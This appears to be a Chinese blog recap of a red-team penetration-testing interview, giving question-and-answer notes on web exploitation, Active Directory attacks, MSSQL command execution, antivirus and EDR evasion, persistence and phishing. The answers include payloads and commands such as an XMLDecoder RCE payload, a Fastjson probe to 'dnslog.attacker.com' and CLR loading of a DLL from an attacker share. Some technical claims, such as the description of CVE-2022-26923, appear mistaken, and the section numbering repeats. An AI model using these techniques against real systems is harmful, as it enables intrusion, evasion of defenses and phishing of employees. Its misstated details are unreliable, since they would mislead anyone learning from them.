2025年渗透测试面试题总结-某360-企业蓝军面试复盘（题目+回答）

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

360-企业蓝军

一、Shiro绕WAF实战方案

二、WebLogic遭遇WAF拦截后的渗透路径

三、JBoss/WebLogic反序列化漏洞原理

四、Fastjson漏洞检测与绕过

五、PHP文件下载漏洞深入利用

六、PHP disable_function绕过原理

七、云主机无内网的深度利用

八、Redis主从复制攻击详解

九、BECT利用链使用条件与原理

十、内网域渗透：域外机器定位域控

十一、攻击17010漏洞后无法抓取密码的解决方案

十一、JBoss反序列化漏洞原理

十二、MSSQL绕过360拦截xp_cmdshell

十三、MSSQL文件上传与存储过程权限

十四、内网文件EXE落地与无网场景利用

十五、NTLM Relay+ADCS漏洞利用条件与原理

十六、CVE-2022-26923（ADCS权限提升）

十七、Vcenter权限获取与DB文件解密

十八、锁屏机器利用与权限维持

十九、MSSQL非xp_cmdshell命令执行方式

二十、域管理员查询失败原因与解决

二十一、查询域管理员的本质与原理

二十二、免杀技术：分离与单体区别

二十三、打点常用漏洞简述

二十四、内网横向扩展策略

二十五、钓鱼攻击全流程设计

二十六、钓鱼上线主机的后续利用

360-企业蓝军
shiro绕waf
weblogic如果在打站的时候，一旦遇到了waf,第一个payload发过去，直接被拦截了，ip也被ban了，如何进行下一步操作
jboss反序列化原理
weblogic反序列化原理,随便说一个漏洞，然后说触发原理
fastjson怎么判断是不是有漏洞，原理是什么
fastjson判断漏洞回显是怎么判断的，是用dns做回显还是其他协议做的，为什么
fastjson高版本，无回显的情况，如何进行绕过，为什么可以这样绕过
php代码审计如果审计到了一个文件下载漏洞，如何深入的去利用？
php里面的disable_function如何去进行绕过，为什么可以绕过，原理是什么
假如说，在攻防的时候，控下来一台机器，但是只是一台云主机，没有连接内网，然后也没有云内网，请问怎么深入的对这太云主机进行利用？
redis怎么去做攻击，主从复制利用条件，为什么主从复制可以拿到shell,原理是什么，主从复制会影响业务吗，主从复制的原理是什么？
bect利用链使用条件，原理，代码跟过底层没有，怎么调用的？
假如我攻击了一台17010的机器，然后机器被打重启了，然后重启成功后，机器又打成功了，但是无法抓到密码，为什么无法抓到，这种情况怎么解决这个问题？
内网我现在在域外有一台工作组机器的权限，但是没有域用户，横向也不能通过漏洞打到一台与域用户的权限，但是我知道一定有域，请问这种情况怎么进入到域中找到域控？
jboss反序列化漏洞原理
内网拿到一台mssql机器的权限，但是主机上有360，一旦开了xpcmdshell就被拦截了，执行命令的权限都没有，这种情况怎么进行绕过？
什么是mssql上传文件，需要开启哪个存储过程的权限？
内网文件exe落地怎么去做，用什么命令去执行落地，如果目标主机不出网怎么办？
内网域渗透中，利用ntlm relay配合adcs这个漏洞的情况，需要什么利用条件，responder这台主机开在哪台机器上，为什么，同时为什么adcs这个漏洞能获取域管理员权限，原理是什么？
内网域渗透中，最新出的CVE-2022-26923 ADCE权限提升漏洞需要什么利用条件，原理是什么，相比原理的ESC8漏洞有什么利用优势？
内网渗透中，如何拿到一套vencter的权限，如果进一步深入利用？db文件如何解密？原理是什么？
venter机器拿到原理员密码了，也登录进去了，但是存在一个问题，就是内部有些机器锁屏了，需要输入密码，这个时候怎么去利用？
内网权限维持的时候，360开启了晶核模式，怎么去尝试权限维持？计划任务被拦截了怎么办？
mssql除了xpcmdshell，还有什么执行系统命令的方式？需要什么权限才可以执行？
如果net group "Domain Admins"/domain这条命令，查询域内管理员，没法查到，那么可能出现了什么问题？怎么解决？
查询域内管理员的这条命令的本质究竟是去哪里查，为什么输如了之后就可以查到？
免杀中，分离免杀和单体免杀有啥区别，为什么要分离，本质是什么？
打点常用什么漏洞，请简述
内网横向中，是直接进行拿一台机器的权限直接开扫，还是有别的办法？
钓鱼是用什么来钓？文案思路？如何判断目标单位的机器是哪种协议出网？是只做一套来钓鱼还是做几套来钓鱼？如何提高钓鱼成功率？
钓鱼上线的主机，如何进行利用？背景是只发现了一个域用户，但是也抓不到密码，但是有域。
一、Shiro绕WAF实战方案

绕过逻辑：
密钥动态爆破：使用ShiroAttack2工具爆破历史漏洞密钥（如kPH+bIxk5D2deZiIxcaaaA==），生成合法Cookie绕过特征检测。
流量分片混淆：将Payload拆分为多段，插入冗余参数（如padding=random）或通过HTTP分块传输（Chunked Encoding）干扰WAF解析。
协议级伪装：封装请求为HTTP/2协议，利用头部压缩特性绕过传统正则匹配。

工具链推荐：
Ysoserial-2025生成动态Gadget链，避免CommonsBeanutils等常见类名触发拦截。
Burp Collaborator实时监控DNS/HTTP回显，验证漏洞有效性。

二、WebLogic遭遇WAF拦截后的渗透路径

IP被封禁的应急处理：
IP池轮换：使用云函数（如AWS Lambda）动态生成代理IP，绕过单IP限制。
协议降级攻击：将T3协议流量伪装为HTTP/1.1，利用Content-Type: application/octet-stream绕过协议识别。

分阶段攻击策略：
初探阶段：发送无害探测包（如t3 12.2.1\nAS:255\nHL:19\n\n），观察WAF响应规则。
载荷拆分：利用Coherence组件的反序列化链，将恶意对象拆分为多个请求分片传输。

三、JBoss/WebLogic反序列化漏洞原理
JBoss（CVE-2015-7501）
触发点：HttpInvoker服务未验证反序列化数据，攻击者发送恶意序列化对象触发RCE。
利用链：基于InvokerTransformer调用Runtime.getRuntime().exec() ，构造链如下：
javaObjectInputStream.readObject() → InvokerTransformer.transform() → Runtime.exec("calc.exe") 
WebLogic（CVE-2017-10271）
漏洞点：wls-wsat组件的XMLDecoder解析漏洞，构造恶意XML触发代码执行。
Payload示例：
xml<java version="1.8" class="java.beans.XMLDecoder"> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="1"> <void index="0"><string>calc.exe</string></void> </array> <void method="start"/> </object> </java>
四、Fastjson漏洞检测与绕过

漏洞判断原理：
DNS回显法：发送Payload {"@type":"java.net.InetAddress","val":"dnslog.attacker.com"} ，观察DNS解析记录。
报错探测：利用autoType开关触发异常（如关闭时抛出autoType is not support）。

高版本无回显绕过：
内存马注入：结合JNDI漏洞加载内存WebShell（如Tomcat的Filter型内存马）。
延时盲注：通过Thread.sleep() 或DNS递归查询实现时间盲注。
二次反序列化：触发其他组件漏洞（如Log4j的JNDI Lookup）。

五、PHP文件下载漏洞深入利用

基础利用：
敏感文件读取：download.php?file=../../.env 获取数据库凭据。
源码泄露：结合PHP伪协议（php://filter/convert.base64-encode/resource=index.php ）读取源码。

组合漏洞利用：
文件包含+下载：通过LFI漏洞包含下载的WebShell文件（如/proc/self/fd/12）。
反序列化触发：下载phar文件触发反序列化漏洞（需phar.readonly=Off ）。

六、PHP disable_function绕过原理

绕过技术：
LD_PRELOAD劫持：利用mail()函数启动子进程，通过putenv()加载恶意so文件执行命令。
FFI扩展利用：直接调用C函数（需PHP≥7.4），如FFI::cdef("int system(char *command);")->system("id");。
ImageMagick漏洞：利用CVE-2016-3718的ephemeral协议执行命令。

防御对抗：
禁用危险函数（如dl()）和扩展（如FFI）。
使用open_basedir限制文件访问范围。

七、云主机无内网的深度利用

攻击路径：
元数据服务利用：访问云厂商元数据接口（如AWS的169.254.169.254）获取临时凭证，横向访问S3/ECS资源。
容器逃逸：利用Cgroup漏洞（CVE-2022-0492）或挂载宿主机目录逃逸到物理机。
凭证泄露挖掘：扫描历史命令、环境变量（env）、配置文件（~/.aws/credentials）。

工具推荐：
CloudMapper自动分析云环境配置。
Pacu 3.0针对AWS的全场景攻击框架。

八、Redis主从复制攻击详解

利用条件：
Redis未授权访问且版本<6.0（默认未启用模块签名验证）。
主从复制功能开放（replicaof命令可用）。

攻击流程：
设置恶意主节点：在攻击机启动Redis服务，生成恶意.so模块。
诱导从节点同步：通过SLAVEOF命令使目标Redis同步攻击机数据。
加载模块执行命令：利用MODULE LOAD加载恶意模块，调用system.exec 执行命令。

业务影响：主从复制可能导致数据覆盖，需谨慎操作。

九、BECT利用链使用条件与原理
利用链条件：
目标依赖库包含Beanutils或Commons-Collections（版本≤3.2.1）。
存在触发反序列化的入口（如HTTP参数、RMI接口）。
触发原理：
通过AnnotationInvocationHandler触发TransformeredMap链，调用InvokerTransformer执行命令。
代码底层调用路径：
javaObjectInputStream.readObject() → AnnotationInvocationHandler.readObject() → TransformeredMap.checkSetValue() → InvokerTransformer.transform() 
调试技巧：使用JD-GUI反编译分析Gadget链，结合IDEA动态调试触发点。
十、内网域渗透：域外机器定位域控

攻击路径：
NTLM Relay攻击：
利用Responder捕获SMB认证请求，中继至LDAP服务添加域管理员用户。
部署位置：需与域控网络互通（如同一VLAN）。

ADCS漏洞利用（ESC8）：
通过HTTP证书申请漏洞获取高权限证书，使用Certipy申请域管理员票据。

定位域控方法：
DNS查询：nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain> 。
NetBIOS扫描：nbtscan -r 192.168.1.0/24查找DOMAIN<1B>记录。

十一、攻击17010漏洞后无法抓取密码的解决方案

原因分析：
目标系统安装补丁（如KB4551853）修复了永恒之蓝的SMBv1协议漏洞，导致明文密码无法抓取。
流量被加密（如SMB Signing启用）或防御工具（如EDR）拦截。

绕过方案：
协议降级：强制使用SMBv1协议（nmap --script smb-protocols）。
哈希传递攻击：使用secretsdump.py 提取NTLM Hash，通过psexec.py -hashes横向移动。
流量混淆：通过DNS隧道或ICMP隐蔽信道传输数据。

十一、JBoss反序列化漏洞原理

漏洞背景：JBoss AS 6.x及更早版本的HttpInvoker服务未对反序列化数据过滤，导致远程代码执行（如CVE-2015-7501）。
触发原理：
入口点：/invoker/readonly接口接收序列化对象。
利用链：基于Apache Commons Collections的InvokerTransformer链，触发任意类方法调用。
javaObjectInputStream.readObject() → InvokerTransformer.transform() → Runtime.getRuntime().exec("calc.exe") 
防御绕过：新版WildFly禁用HttpInvoker，企业可通过升级或启用反序列化过滤器（如SerialKiller）防御。
十二、MSSQL绕过360拦截xp_cmdshell

绕过方案：

CLR集成：
启用CLR：sp_configure 'clr enabled', 1; RECONFIGURE;
加载恶意DLL：CREATE ASSEMBLY ExecCmd FROM '\\attacker\share\evil.dll' ，通过存储过程调用。
优势：无需xp_cmdshell，且360对CLR检测较弱。

Agent Jobs调度：
创建作业：sp_add_job @job_name='UpdateTask' → 添加命令步骤exec master..xp_cmdshell 'whoami'。
权限需求：SQLAgentUserRole角色权限。

sp_OACreate执行：
启用OLE自动化：sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
调用wscript.shell ：DECLARE @o INT; EXEC sp_OACreate 'wscript.shell', @o OUT; EXEC sp_OAMethod @o, 'run', NULL, 'cmd /c whoami';

十三、MSSQL文件上传与存储过程权限

上传文件方法：
BCP命令：导出表数据到文件，需ADMINISTER BULK OPERATIONS权限。
OLE自动化：通过sp_OACreate调用ADODB.Stream写入文件。
CLR存储过程：自定义DLL实现文件操作。

关键权限：
xp_cmdshell需sysadmin角色。
sp_OACreate需启用Ole Automation Procedures并授予EXECUTE权限。

十四、内网文件EXE落地与无网场景利用

落地方案：

编码传输：
Certutil：certutil -encode payload.exe payload.b64，目标端解码certutil -decode payload.b64 payload.exe 。
Debug.exe ：将EXE转为十六进制脚本，通过调试器还原。

无网执行：
计划任务：schtasks /create /tn "Update" /tr C:\payload.exe /sc once /st 00:00（需管理员权限）。
服务创建：sc create MyService binPath= C:\payload.exe start= auto。

横向传输：通过SMB共享（copy \\192.168.1.2\share\payload.exe C:\）或Web目录（如IIS）上传。

十五、NTLM Relay+ADCS漏洞利用条件与原理

利用条件：

ADCS配置：启用HTTP证书注册接口（默认启用）。
中继目标：域内主机存在未修复的NTLM签名漏洞（如SMB Signing未强制）。
Responder部署位置：需位于与目标同一广播域（如同一VLAN），以捕获Net-NTLMv2哈希。

提权原理：

ADCS漏洞（ESC8）：通过中继的Net-NTLMv2哈希申请证书，证书模板允许域用户申请高权限证书（如域管理员模板）。
Certipy工具链：自动化生成证书→申请TGT→获取域控权限。

十六、CVE-2022-26923（ADCS权限提升）

利用条件：

域用户权限。
证书模板允许用户指定SAN（Subject Alternative Name），且管理员未限制SAN字段。

原理：

攻击者伪造SAN为域管理员（如Administrator@domain），申请证书后通过S4U2Self获取域管理员TGT。
相比ESC8优势：无需中继，直接利用证书模板漏洞，成功率更高且隐蔽性强。

十七、Vcenter权限获取与DB文件解密

攻击路径：

漏洞利用：CVE-2021-21972（SSRF+文件上传）上传WebShell，获取vCenter Server权限。
DB文件解密：
文件位置：/storage/db/vpostgres/data中的encrypted.db 。
解密工具：使用vCenter-decrypt.py 提取硬编码密钥解密。
原理：vCenter 7.x使用AES-256加密配置文件，密钥存储在/etc/vmware/vpx/vcdb.properties 。

深入利用：

通过vCenter管理界面部署恶意虚拟机，利用VM Escape攻击宿主机。

十八、锁屏机器利用与权限维持

锁屏绕过：

内存提取密码：使用Mimikatz的sekurlsa::logonpasswords抓取已登录用户的明文密码或哈希。
物理攻击：替换粘滞键程序（C:\Windows\System32\sethc.exe ）为cmd.exe ，通过登录界面调用。

360晶核模式绕过：

WMI事件订阅：通过__EventFilter和CommandLineEventConsumer执行持久化命令。
注册表隐蔽键：
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce添加启动项。
防御对抗：使用非常规键名（如UpdateTask）绕过关键字检测。

十九、MSSQL非xp_cmdshell命令执行方式

sp_OACreate：
权限：sysadmin或db_owner+启用OLE自动化。
命令示例：EXEC sp_OACreate 'wscript.shell', @o OUT; EXEC sp_OAMethod @o, 'run', NULL, 'cmd /c whoami';

CLR集成：需UNSAFE ASSEMBLY权限，加载C#编写的恶意DLL。
Agent Jobs：需SQLAgentUserRole权限，创建任务执行命令。

二十、域管理员查询失败原因与解决

可能原因：

当前用户无域管理员组查询权限。
域控防火墙阻断RPC/SAMR协议通信。
域控DNS解析异常。

解决方案：

PowerShell查询：Get-ADGroupMember "Domain Admins" -Server DomainController。
LDAP直接查询：ldapsearch -H ldap://dc.domain.com -b "CN=Domain Admins,CN=Users,DC=domain,DC=com"。

二十一、查询域管理员的本质与原理

底层机制：
net group "Domain Admins" /domain通过SAMR协议向域控发起查询，需域用户权限。
协议路径：
Client → DC（TCP 445/SMB） → SAMR API → 返回组成员列表  
依赖条件：域控的Netlogon服务正常运行且客户端能解析域控IP。
二十二、免杀技术：分离与单体区别

类型 实现方式 优势本质
分离免杀 Shellcode远程加载（HTTPS/DNS）静态检测难度高动态加载规避特征匹配
单体免杀修改PE头/加密代码段无需网络通信混淆代码逻辑绕过静态分析

分离必要性：降低单文件熵值，规避沙箱检测，适应网络隔离环境。

二十三、打点常用漏洞简述

Web漏洞：SQL注入、Fastjson反序列化、Log4j JNDI注入。
服务漏洞：SMBGhost（CVE-2020-0796）、Exchange SSRF（CVE-2024-21410）。
框架漏洞：Spring Cloud Gateway RCE（CVE-2022-22947）。

二十四、内网横向扩展策略

非扫描式渗透：

凭证接力：使用CrackMapExec传递哈希（如cme smb 192.168.1.0/24 -u user -H ntlm_hash）。
漏洞精准打击：针对高价值主机（如域控）利用已知漏洞（如Zerologon）。
协议滥用：通过LLMNR/NBT-NS投毒诱导凭证泄露。

二十五、钓鱼攻击全流程设计

攻击链设计：

载体选择：
邮件附件：LNK文件伪装为PDF图标。
恶意链接：短域名跳转至钓鱼页面（如虚假O365登录页）。

协议探测：
多协议Payload：发送HTTP/DNS/ICMP探测包，观察出网行为。

文案优化：
行业定制：针对金融行业伪造“审计通知”，针对IT部门伪装“漏洞修复指南”。

成功率提升：
多模板测试：A/B测试不同文案，筛选高点击率模板。
时间选择：工作日上午9-11点发送，提高打开率。

二十六、钓鱼上线主机的后续利用

域内横向路径：

Kerberoasting：请求高权限SPN票据（如setspn -T domain -Q */*），离线破解哈希。
NTLM Relay攻击：诱导域控发起SMB认证，中继至LDAP服务添加域管理员。
委派漏洞利用：检查msDS-AllowedToDelegateTo，利用约束委派获取域控权限。

类型	实现方式	优势	本质
分离免杀	Shellcode远程加载（HTTPS/DNS）	静态检测难度高	动态加载规避特征匹配
单体免杀	修改PE头/加密代码段	无需网络通信	混淆代码逻辑绕过静态分析